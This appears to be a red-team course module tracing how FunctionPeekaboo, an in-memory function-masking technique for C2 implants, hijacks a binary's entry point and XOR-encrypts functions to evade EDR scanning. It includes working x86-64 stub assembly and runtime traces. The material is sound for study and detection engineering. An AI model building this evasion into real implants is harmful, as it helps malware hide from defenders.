Module 7: Initialization & Runtime Flow
From binary load to encrypted-at-rest — tracing the complete execution flow from startup through function calls.
Module Objective
Trace the complete runtime lifecycle of a FunctionPeekaboo-instrumented binary: the .stub entry point hijack, initial encryption of all registered functions, the transition to normal program execution, and the steady-state flow of decrypt-on-call and re-encrypt-on-return during operation.
1. The Boot Sequence
When the Windows loader executes the binary, the normal startup sequence is hijacked by FunctionPeekaboo. Here is the complete sequence from process creation to steady-state operation:
Boot Sequence (diagram): Maps PE sections, resolves imports → Encrypt all funcs, set up TEB → CRT startup, mainCRTStartup() → Application code, self-masking active
| Step | What Happens | State of Registered Functions |
|---|---|---|
| 1. PE Loading | Windows maps the executable into memory, resolves imports, processes relocations | Cleartext (as compiled) |
| 2. Entry Point | Windows calls AddressOfEntryPoint, which points to .stub (set by modifyEP.py) | Cleartext |
| 3. .stub Init | The stub walks .funcmeta and XOR-encrypts every registered function body | Transitioning to encrypted |
| 4. TEB Setup | The stub initializes TEB UserReserved fields to zero (no active function) | All encrypted |
| 5. Jump to Original EP | The stub jumps to the original entry point (saved during post-processing) | All encrypted |
| 6. CRT Initialization | mainCRTStartup runs: initializes heap, stdio, runs static constructors | All encrypted (CRT functions are not registered) |
| 7. main() Entry | Application code begins executing | All encrypted (self-masking active) |
2. The .stub Initialization Code
The .stub section contains the initialization routine. Its job is to encrypt all registered functions before any application code runs:
x86-64 Assembly
section .stub
_peekaboo_init:
; === Prologue: save all registers ===
pushfq
push rax
push rbx
push rcx
push rdx
push rsi
push rdi
push r8
push r9
push r10
push r11
; === Initialize TEB UserReserved fields ===
xor eax, eax
mov qword ptr gs:[0x1478], rax ; UserReserved[0] = NULL
mov qword ptr gs:[0x1480], rax ; UserReserved[1] = 0
mov qword ptr gs:[0x1488], rax ; UserReserved[2] = 0
; === Find image base ===
call .Lgetip
.Lgetip:
pop rbx ; RBX = our address
and rbx, 0xFFFFFFFFFFFF0000 ; Align to 64KB
.Lscan:
cmp word ptr [rbx], 0x5A4D ; "MZ"?
je .Lfound
sub rbx, 0x10000
jmp .Lscan
.Lfound:
; RBX = ImageBase
; === Find .funcmeta section ===
mov ecx, [rbx + 0x3C] ; e_lfanew
lea rdx, [rbx + rcx] ; PE header
movzx ecx, word ptr [rdx + 6] ; NumberOfSections
movzx r8d, word ptr [rdx + 20] ; SizeOfOptionalHeader
lea rsi, [rdx + 24 + r8] ; First section header
.Lsec_loop:
cmp dword ptr [rsi], 0x6E75662E ; ".fun"
jne .Lsec_next
cmp dword ptr [rsi+4], 0x74656D63 ; "cmet"
je .Lsec_found
.Lsec_next:
add rsi, 40
dec ecx
jnz .Lsec_loop
jmp .Ldone ; .funcmeta not found, skip
.Lsec_found:
mov ecx, [rsi + 12] ; .funcmeta VirtualAddress
lea rsi, [rbx + rcx] ; RSI = .funcmeta data
; === Iterate entries and encrypt each function ===
.Lentry_loop:
mov edi, [rsi] ; FunctionRVA
test edi, edi
jz .Ldone ; NULL terminator = end
mov ecx, [rsi + 4] ; FunctionSize
movzx eax, byte ptr [rsi + 8] ; XorKey
; Calculate function VA
lea rdi, [rbx + rdi] ; RDI = function body address
; VirtualProtect to RW
sub rsp, 40 ; Shadow space + oldProtect
lea r9, [rsp + 32] ; &oldProtect
mov r8d, 0x04 ; PAGE_READWRITE
mov edx, ecx ; Size
mov rcx, rdi ; Address
call [VirtualProtect_IAT]
add rsp, 40
; XOR encrypt the function body
mov ecx, [rsi + 4] ; Reload size
movzx eax, byte ptr [rsi + 8] ; Reload key
.Lxor:
xor byte ptr [rdi], al
inc rdi
dec ecx
jnz .Lxor
; Reload function address for VirtualProtect restore
mov edi, [rsi]
lea rdi, [rbx + rdi]
; VirtualProtect back to RX
sub rsp, 40
lea r9, [rsp + 32]
mov r8d, 0x20 ; PAGE_EXECUTE_READ
mov edx, [rsi + 4]
mov rcx, rdi
call [VirtualProtect_IAT]
add rsp, 40
; Mark as encrypted
mov byte ptr [rsi + 9], 1
; Next entry
add rsi, 12
jmp .Lentry_loop
.Ldone:
; === Restore all registers ===
pop r11
pop r10
pop r9
pop r8
pop rdi
pop rsi
pop rdx
pop rcx
pop rbx
pop rax
popfq
; === Jump to original entry point ===
jmp ORIGINAL_ENTRY_POINT ; Patched by modifyEP.py
Timing Window
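Between PE loading (step 1) and .stub initialization (step 3), the registered functions are briefly in cleartext in memory. This window is short (on the order of microseconds per registered function, since each one costs two VirtualProtect calls). It closes before the original entry point, the CRT, or any application code runs, although loader-driven code such as imported DLLs' initialization routines and TLS callbacks executes before AddressOfEntryPoint. An EDR would need to scan the image at load time, before the entry point executes, to catch this window. Once initialization completes, functions remain encrypted until explicitly called.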
3. Steady-State Runtime Flow
After initialization, the self-masking system operates transparently during normal program execution. Here is a detailed trace of what happens when a peekaboo function is called:
Caller code: call beacon_checkin
Time 0: beacon_checkin body is ENCRYPTED (XOR'd garbage bytes)
Time 1: Prologue stub executes:
- CALL/POP gets current address
- Pushes all registers + flags
- Calls handler(func_ptr, DECRYPT)
Time 2: Handler executes:
- Finds PE image base
- Parses .funcmeta, finds beacon_checkin entry
- VirtualProtect(body, size, PAGE_READWRITE)
- XOR decrypts body bytes
- VirtualProtect(body, size, PAGE_EXECUTE_READ)
- Sets IsEncrypted = 0
- Stores func_ptr in TEB UserReserved[0]
Time 3: Prologue stub continues:
- Pops all registers + flags
- Falls through to now-decrypted function body
Time 4: beacon_checkin body executes NORMALLY
(all original instructions run as compiled)
Time 5: beacon_checkin reaches a RET instruction
Epilogue stub executes:
- Pushes all registers + flags
- Calls handler(func_ptr, ENCRYPT)
Time 6: Handler executes:
- VirtualProtect(body, size, PAGE_READWRITE)
- XOR encrypts body bytes
- VirtualProtect(body, size, PAGE_EXECUTE_READ)
- Sets IsEncrypted = 1
- Clears TEB UserReserved[0]
Time 7: Epilogue stub continues:
- Pops all registers + flags
- Executes RET (returns to caller)
Time 8: beacon_checkin body is ENCRYPTED again
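The trace uses the same XOR step for both directions, which works because XOR with a fixed key is its own inverse. The following is a minimal Python illustration of that property on a plain byte string, not the handler itself; the sample bytes and the key value are assumptions chosen for the example.

```python
def xor_mask(body: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in body)


# Hypothetical stand-in for a function body (push rbp; mov rbp, rsp; ret).
original = bytes([0x55, 0x48, 0x89, 0xE5, 0xC3])
key = 0x5A  # assumed key value, for illustration only

masked = xor_mask(original, key)   # the "ENCRYPT" direction
restored = xor_mask(masked, key)   # the "DECRYPT" direction is the same call

print(masked.hex(), restored == original)
```

Because both directions are the same operation, the IsEncrypted flag is the only record of which state the bytes are in.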
4. Function Call Chains
Real programs involve deep call chains. Here is how FunctionPeekaboo handles nested calls between instrumented functions:
Nested Call Example
main() calls func_A() calls func_B() calls func_C()
(only func_A and func_C are peekaboo-registered)
Step 1: main calls func_A
- func_A prologue: DECRYPT func_A
- State: func_A=clear, func_B=N/A, func_C=encrypted
Step 2: func_A calls func_B (NOT registered)
- No prologue/epilogue stubs
- func_B runs normally
- State: func_A=clear, func_C=encrypted
Step 3: func_B calls func_C
- func_C prologue: DECRYPT func_C
- State: func_A=clear, func_C=clear (2 decrypted)
Step 4: func_C returns to func_B
- func_C epilogue: ENCRYPT func_C
- State: func_A=clear, func_C=encrypted
Step 5: func_B returns to func_A
- No epilogue (func_B not registered)
- State: func_A=clear, func_C=encrypted
Step 6: func_A returns to main
- func_A epilogue: ENCRYPT func_A
- State: all encrypted
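The six steps above can be reproduced with a small state model. This sketch only tracks which registered functions are in the clear at each transition. It does not touch memory, and the `call` helper and `trace` list are names invented for the illustration.

```python
REGISTERED = {"func_A", "func_C"}  # peekaboo-registered functions in the example
clear = set()                      # registered functions currently decrypted
trace = []                         # (event, functions in the clear) snapshots


def call(name, body=None):
    """Model one call: prologue on entry, optional nested call, epilogue on return."""
    if name in REGISTERED:
        clear.add(name)            # prologue stub: DECRYPT
    trace.append((f"enter {name}", sorted(clear)))
    if body is not None:
        body()                     # run the nested call, if any
    if name in REGISTERED:
        clear.discard(name)        # epilogue stub: ENCRYPT
    trace.append((f"leave {name}", sorted(clear)))


# main -> func_A -> func_B -> func_C
call("func_A", lambda: call("func_B", lambda: call("func_C")))

for event, state in trace:
    print(f"{event:14s} clear={state}")

max_clear = max(len(state) for _, state in trace)
```

The model makes the peak visible: while func_C runs, two registered functions are decrypted at once, because func_A stays in the clear for as long as it is on the call stack.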
5. Thread Safety
In a multithreaded implant, different threads may call different peekaboo functions simultaneously. The handler must be thread-safe:
| Concern | How FunctionPeekaboo Handles It |
|---|---|
| TEB state | Per-thread (each thread has its own TEB via GS), no shared state for tracking |
| .funcmeta writes | The IsEncrypted flag is a single byte, and byte writes are atomic on x86. Atomic flag writes do not, however, prevent the race that arises when two threads call the same function simultaneously (see next row) |
| Same function, two threads | If thread A decrypts func_X and thread B also needs func_X, thread B sees it already decrypted (IsEncrypted=0) and skips decryption. But if thread A re-encrypts while B is still executing, corruption occurs |
| VirtualProtect | Affects the entire process (memory permissions are per-page, not per-thread). Changes by one thread are visible to all |
The Thread Race Problem
The most critical thread safety issue: if two threads call the same peekaboo function, thread A might re-encrypt it (on return) while thread B is still executing it. The simplest mitigation is a reference counter per function in .funcmeta — only re-encrypt when the counter reaches zero. The PoC may not fully address this; production implementations like Nighthawk use more sophisticated synchronization.
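The reference-counter idea can be modeled in a few lines. This is a toy Python simulation of the counting logic only, under the assumption that the counter and the state change are updated together under one lock. The class and field names are hypothetical, and nothing here reflects how the PoC or any production implementation actually synchronizes.

```python
import threading


class MaskedFunction:
    """Toy model: `encrypted` stands in for the state of one function body."""

    def __init__(self):
        self._lock = threading.Lock()
        self.active = 0        # threads currently inside the function
        self.encrypted = True
        self.decrypts = 0
        self.encrypts = 0

    def enter(self):
        with self._lock:
            if self.active == 0:   # first caller in: decrypt once
                self.encrypted = False
                self.decrypts += 1
            self.active += 1

    def leave(self):
        with self._lock:
            self.active -= 1
            if self.active == 0:   # last caller out: re-encrypt
                self.encrypted = True
                self.encrypts += 1


def worker(fn, violations, rounds=1000):
    for _ in range(rounds):
        fn.enter()
        if fn.encrypted:           # would mean we are running masked bytes
            violations.append(1)
        fn.leave()


fn = MaskedFunction()
violations = []
threads = [threading.Thread(target=worker, args=(fn, violations)) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(fn.active, fn.encrypted, len(violations))
```

The check and the state change sit inside the same critical section. Counting without the lock would reintroduce the race between one thread's decrement and another thread's entry.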
6. Exception Handling Considerations
If a peekaboo function throws an exception (C++ exception, SEH, or hardware exception), the normal return path is bypassed. The epilogue stub never runs, leaving the function decrypted:
Exception Scenarios
| Exception Type | Impact | Mitigation |
|---|---|---|
| C++ throw | Stack unwinding skips the epilogue stub | Register an SEH handler in the prologue that re-encrypts on unwind |
| SEH exception | If caught by a handler in a parent frame, epilogue is skipped | Use __finally blocks or custom unwind handlers |
| Access violation | Process may terminate; re-encryption irrelevant | None needed (process is dying) |
| VEH handler | Vectored exception handler might resume execution; function stays decrypted | VEH handler should check TEB state and re-encrypt if needed |
The PoC FunctionPeekaboo focuses on the happy path. A production implementation would register unwind handlers to ensure re-encryption even on exceptional control flow paths.
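The difference between the happy path and an unwind-aware path can be shown with an analogy in Python, where try/finally plays the role of a __finally block or unwind handler. This is a state model only; the function names are hypothetical and the set `clear` simply records which function would be left decrypted.

```python
clear = set()  # names of functions currently in the clear


def call_happy_path_only(name, body):
    clear.add(name)        # prologue: DECRYPT
    body()
    clear.discard(name)    # epilogue: skipped entirely if body() raises


def call_with_unwind_handler(name, body):
    clear.add(name)        # prologue: DECRYPT
    try:
        body()
    finally:
        clear.discard(name)  # runs on normal return and on unwinding


def failing_body():
    raise RuntimeError("simulated exception inside the function")


def run(call, name):
    """Invoke `call`, catch the exception in a parent frame, report what stayed clear."""
    clear.clear()
    try:
        call(name, failing_body)
    except RuntimeError:
        pass
    return set(clear)


left_clear_plain = run(call_happy_path_only, "func_X")
left_clear_guarded = run(call_with_unwind_handler, "func_X")
print(left_clear_plain, left_clear_guarded)
```

In the first variant the exception is handled by a parent frame and func_X is left in the clear, which is the situation described in the table rows for C++ and SEH exceptions.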
7. Integration with Sleep Obfuscation
FunctionPeekaboo and sleep obfuscation can be combined for maximum coverage:
Combined Protection Timeline:
Active Phase (checking in, executing commands):
FunctionPeekaboo: ~98% of code encrypted (only active function decrypted)
Sleep obfuscation: not active (implant is awake)
Net coverage: ~98%
Sleep Phase (waiting between check-ins):
FunctionPeekaboo: 100% encrypted (no function executing)
Sleep obfuscation: 100% encrypted (entire image masked)
Net coverage: 100% (double encrypted)
Result: At no point is more than ~2% of code in cleartext
Layered Defense
Using both techniques together means the implant has strong protection in both active and passive states. Sleep obfuscation handles the sleep window, and FunctionPeekaboo handles the active window. The ~2% gap during active execution corresponds to the function currently running; as the nested call example in Section 4 shows, registered callers still on the stack are also in the clear, so the exposed fraction grows with call depth. Even so, it remains a small signature surface for a scanner to catch.
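The percentages in the timeline are easy to sanity-check with a back-of-the-envelope calculation. The sketch below assumes 50 registered functions of equal size, which is one way to arrive at roughly 2% per function; the source does not state the actual count or sizes, so both are assumptions.

```python
def cleartext_fraction(sizes, on_stack):
    """Fraction of registered code bytes in the clear for a given set of active functions."""
    total = sum(sizes.values())
    exposed = sum(sizes[name] for name in on_stack)
    return exposed / total


# Assumption: 50 registered functions of 1 KB each (not a figure from the source).
sizes = {f"func_{i}": 1024 for i in range(50)}

one_active = cleartext_fraction(sizes, ["func_0"])
two_active = cleartext_fraction(sizes, ["func_0", "func_1"])
asleep = cleartext_fraction(sizes, [])

print(f"{one_active:.0%} {two_active:.0%} {asleep:.0%}")
```

With unequal function sizes the exposed fraction depends on which functions are active, so a single large registered function can dominate the figure.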
8. Debugging FunctionPeekaboo Binaries
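Debugging is more complex because function bodies are encrypted at rest. When you set a breakpoint in a debugger, the breakpoint address might contain encrypted garbage, and a software breakpoint byte (INT3) written into an encrypted body is XORed along with the rest of the body on the next decryption, so it no longer traps and instead corrupts the instruction it replaced: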
Debugging Tips
- Break on the prologue stub: Set breakpoints at function entry (before the first instruction of the stub). The stub is never encrypted — only the body is.
- Break after decryption: Set a breakpoint on the handler’s return. At that point, the function body is decrypted and you can inspect it normally.
- Disable masking for debugging: Remove the peekaboo attribute from the function you want to debug and recompile.
- Single-step through stubs: Use single-stepping (F11/step-into) through the prologue to watch the decryption happen in real time.
- Inspect .funcmeta: Dump the .funcmeta section to see which functions are registered and their current encryption state.
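For the last tip, a dumped .funcmeta blob can be decoded with a short script. The layout below is inferred from the offsets used in the stub listing (FunctionRVA at +0, FunctionSize at +4, XorKey at +8, IsEncrypted at +9, 12-byte stride, zero RVA as terminator). Treating the last two bytes of each entry as padding is an assumption, and the sample blob is fabricated for the demonstration.

```python
import struct

# Little-endian: u32 RVA, u32 size, u8 key, u8 flag, 2 bytes assumed padding = 12 bytes.
ENTRY = struct.Struct("<IIBBxx")


def parse_funcmeta(blob: bytes):
    """Decode entries until a zero FunctionRVA terminator or the end of the blob."""
    entries = []
    for offset in range(0, len(blob) - ENTRY.size + 1, ENTRY.size):
        rva, size, key, flag = ENTRY.unpack_from(blob, offset)
        if rva == 0:
            break
        entries.append({"rva": rva, "size": size, "key": key, "encrypted": bool(flag)})
    return entries


# Fabricated sample: two entries followed by a terminator.
sample = (
    ENTRY.pack(0x1000, 0x80, 0x5A, 1)
    + ENTRY.pack(0x1100, 0x40, 0xC3, 0)
    + bytes(ENTRY.size)
)

entries = parse_funcmeta(sample)
for e in entries:
    print(f"rva={e['rva']:#06x} size={e['size']:#x} key={e['key']:#04x} encrypted={e['encrypted']}")
```

A dump taken from the file on disk shows the initial flag values, while a dump taken from a live process reflects the state at the moment of capture.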
9. Performance Profiling
| Operation | Typical Latency | Notes |
|---|---|---|
| Prologue stub (register save) | ~10ns | Push instructions, fast |
| Handler: PE parsing | ~50ns | Memory reads, cached after first call |
| Handler: .funcmeta lookup | ~20ns | Linear scan, typically <20 entries |
| Handler: VirtualProtect (RX→RW) | ~1-5μs | System call, dominates total time |
| Handler: XOR loop (1KB function) | ~100ns | Fast, memory-bound |
| Handler: VirtualProtect (RW→RX) | ~1-5μs | Second system call |
| Epilogue stub (register restore) | ~10ns | Pop instructions, fast |
| Total per call+return | ~4-20μs | Dominated by VirtualProtect syscalls |
For a C2 beacon that checks in every 60 seconds, a 20μs overhead per function call is completely negligible. Even with dozens of peekaboo functions called per check-in cycle, the total overhead is under 1ms — invisible to the user and the C2 framework.
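The totals can be checked by adding up the rows of the table. The sketch assumes that each handler row is paid twice per call (once for decrypt, once for re-encrypt), that the two stub rows are paid once each, and that a check-in makes 36 instrumented calls; the call count is a hypothetical figure standing in for "dozens".

```python
# Latencies from the table, in nanoseconds.
STUB_NS = 10 + 10                 # prologue register save + epilogue register restore
HANDLER_FIXED_NS = 50 + 20 + 100  # PE parsing + .funcmeta lookup + XOR loop (1 KB)
VP_LOW_NS, VP_HIGH_NS = 1_000, 5_000  # one VirtualProtect call, best and worst case


def per_call_return_ns(vp_ns: int) -> int:
    """Cost of one call plus return: two handler runs, each with two VirtualProtect calls."""
    handler_ns = HANDLER_FIXED_NS + 2 * vp_ns
    return STUB_NS + 2 * handler_ns


low_ns = per_call_return_ns(VP_LOW_NS)
high_ns = per_call_return_ns(VP_HIGH_NS)

calls_per_checkin = 36  # assumption, not a measured value
worst_case_ms = calls_per_checkin * high_ns / 1_000_000

print(low_ns, high_ns, worst_case_ms)
```

Under these assumptions the range lands on the table's ~4-20μs total, and the per-check-in cost stays below 1ms, with the four VirtualProtect calls accounting for nearly all of it.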
Knowledge Check
Q1: When are all registered functions first encrypted?
Q2: What is the main thread safety risk with FunctionPeekaboo?
Q3: What dominates the per-function-call performance overhead?